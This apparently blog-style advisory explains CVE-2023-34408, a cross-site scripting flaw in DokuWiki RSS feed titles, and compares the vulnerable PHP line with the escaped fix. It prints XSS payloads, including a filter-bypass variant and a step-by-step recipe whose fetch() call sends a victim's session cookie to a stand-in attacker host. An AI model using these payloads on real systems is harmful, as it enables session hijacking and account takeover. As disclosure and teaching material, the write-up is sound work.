CVE-2023-34408 - Exploiting XSS in DokuWiki RSS Feeds—How Attackers Can Inject Malicious Scripts (Full Details & Example)

---

DokuWiki is a widely used open-source wiki platform, popular for its easy setup and flat-file storage. But just like any web application, it’s important to keep an eye on security. In this deep-dive, we take a closer look at CVE-2023-34408—a vulnerability that allows Cross-Site Scripting (XSS) through RSS feed titles in DokuWiki versions before 2023-04-04a. You’ll learn what’s going on, how it can be exploited, and see some code snippets for better understanding.

What is CVE-2023-34408?

This vulnerability targets how DokuWiki generates RSS feeds. Specifically, if a wiki page or change log entry contains unsanitized HTML (such as <script> tags) in its title, that content ends up inside the RSS feed. If someone views the RSS feed using a browser or a client that executes JavaScript, the script will run in the user’s context—classic XSS (Cross-Site Scripting).

References

- DokuWiki Security Advisory
- CVE Details Page
- DokuWiki Changelog

Attack Vector

Let’s say an attacker can edit or create new wiki pages (such as on a public or poorly protected DokuWiki install, or even through social engineering/compromised accounts).

They insert malicious content into a page title—for example, adding a script tag.

2. The RSS feed is generated, including the malicious title, without proper escaping or sanitization.

Suppose an attacker creates a new page and sets its title to this

<script>alert('XSS in DokuWiki RSS!');</script>

Or, using character encoding to try to bypass naïve filters

"><script>alert('XSS');</script>

The section responsible for generating RSS titles looked like this (simplified example)

// Vulnerable version: No escaping
$output .= '<title>' . $pageTitle . '</title>';

If $pageTitle contains HTML tags or scripts, they are output as-is.

The resulting RSS might look like this (trimmed for clarity)

<item>
  <title><script>alert('XSS in DokuWiki RSS!');</script></title>
  <link>https://wiki.example.com/doku.php?id=malicious_page</link>;
</item>

4. Exploitation

- Victim opens the RSS feed (for example, https://wiki.example.com/feed.php).

Script executes in their browser, performing any actions as the logged-in user.

Attack Impact: An attacker can steal cookies, impersonate users, or modify wiki content.

Step 1: Create a wiki page with this as the title

"><script>fetch('https://evil.example.com?cookie='+document.cookie)</script>

Step 2: Wait for an admin to preview the RSS feed. When they do, the script fires and their session cookie is sent to the attacker’s server—full session hijack achieved.

Patch & Fix

The DokuWiki developers addressed this in version 2023-04-04a. They now escape or strip dangerous content in RSS title fields.

Fixed code example

// Safe version: Escape HTML special chars for RSS/XML context
$output .= '<title>' . htmlspecialchars($pageTitle, ENT_XML1) . '</title>';

Conclusion

Even one unsanitized line can open the door to serious attacks—demonstrated perfectly by CVE-2023-34408. If you use DokuWiki, staying up to date isn’t just routine maintenance—it’s critical security hygiene.

### More Info / Resources

- GitHub Security Advisory
- Official DokuWiki Download Page (for updates)
- About Cross-Site Scripting (OWASP)

Stay safe, and always sanitize inputs—especially in places you’d least expect!

Timeline

Published on: 06/05/2023 02:15:00 UTC
Last modified on: 06/09/2023 18:44:00 UTC